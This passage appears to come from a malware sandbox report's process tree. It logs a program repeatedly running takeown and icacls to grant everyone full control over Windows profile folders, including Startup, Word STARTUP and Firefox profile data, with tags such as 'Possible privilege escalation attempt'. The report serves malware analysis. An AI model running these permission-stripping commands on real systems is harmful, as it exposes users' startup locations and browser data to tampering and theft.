C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException\Low && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException\Low3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException\Low /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatCache && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatCache3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatCache /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatCache\Low && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatCache\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatCache\Low3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatCache\Low /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatUACache && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatUACache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatUACache3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatUACache /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IEDownloadHistory && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IEDownloadHistory /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IEDownloadHistory3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IEDownloadHistory /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IETldCache && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IETldCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IETldCache3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IETldCache /grant everyone:(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IETldCache\Low && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IETldCache\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IETldCache\Low3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IETldCache\Low /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PrivacIE && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PrivacIE /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PrivacIE3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PrivacIE /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PrivacIE\Low && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PrivacIE\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PrivacIE\Low3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PrivacIE\Low /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Word && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Word /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Word3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Word /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla && icacls C:\Users\Admin\AppData\Roaming\Mozilla /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Extensions && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Extensions /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Extensions3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Extensions /grant everyone:(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\events && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\events /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\events3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Pending Pings && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Pending Pings /grant everyone:(f)2⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Pending Pings3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.Admin && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.Admin /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.Admin3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.Admin /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\bookmarkbackups && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\bookmarkbackups /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\bookmarkbackups3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\bookmarkbackups /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\browser-extension-data && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\browser-extension-data /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\browser-extension-data3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\browser-extension-data /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\browser-extension-data\[email protected] && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\browser-extension-data\[email protected] /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\browser-extension-data\[email protected]3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\browser-extension-data\[email protected] /grant everyone:(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\crashes && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\crashes /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\crashes3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\crashes /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\crashes\events && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\crashes\events /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\crashes\events3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\crashes\events /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\db && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\db /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\db3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\db /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\events && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\events /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\events3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\events /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\pending_pings && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\pending_pings /grant everyone:(f)2⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\pending_pings3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\pending_pings /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\tmp && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\tmp /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\tmp3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\tmp /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\extension-store && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\extension-store /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\extension-store3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\extension-store /grant everyone:(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\minidumps && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\minidumps /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\minidumps3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\minidumps /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\security_state && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\security_state /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\security_state3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\security_state /grant everyone:(f)3⤵
-
-
-
